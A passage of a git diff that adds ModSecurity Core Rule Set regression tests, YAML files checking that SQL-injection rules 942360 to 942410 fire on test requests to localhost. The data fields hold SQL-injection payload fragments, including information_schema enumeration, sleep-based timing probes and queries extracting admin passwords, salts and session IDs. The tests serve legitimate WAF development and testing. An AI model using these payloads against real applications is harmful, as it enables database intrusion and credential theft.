"/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + method: POST + port: 80 + uri: / + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log_contains: id "942360" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml new file mode 100644 index 000000000..abe503a39 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -0,0 +1,112 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942361.yaml +tests: + - test_title: 942361-1 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "'alter a" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-2 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-3 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "'ALTER A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-4 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "' alter/" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-5 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\" UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-6 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "'UNION A" + version: HTTP/1.0 + output: + log_contains: id "942361" + - test_title: 942361-7 + desc: "Detects basic SQL injection based on keyword alter or union" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "' union/" + version: HTTP/1.0 + output: + log_contains: id "942361" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml new file mode 100644 index 000000000..de2866b44 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942370.yaml +tests: + - test_title: 942370-1 + desc: "classic SQL injection probings 2/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log_contains: id "942370" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml new file mode 100644 index 000000000..da6e2ee6a --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -0,0 +1,667 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml new file mode 100644 index 000000000..41aeca8b6 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942390.yaml +tests: + - test_title: 942390-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log_contains: id "942390" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml new file mode 100644 index 000000000..b70bddad2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942400.yaml +tests: + - test_title: 942400-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log_contains: id "942400" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml new file mode 100644 index 000000000..d708bf10d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -0,0 +1,1777 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942410.yaml +tests: + - test_title: 942410-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 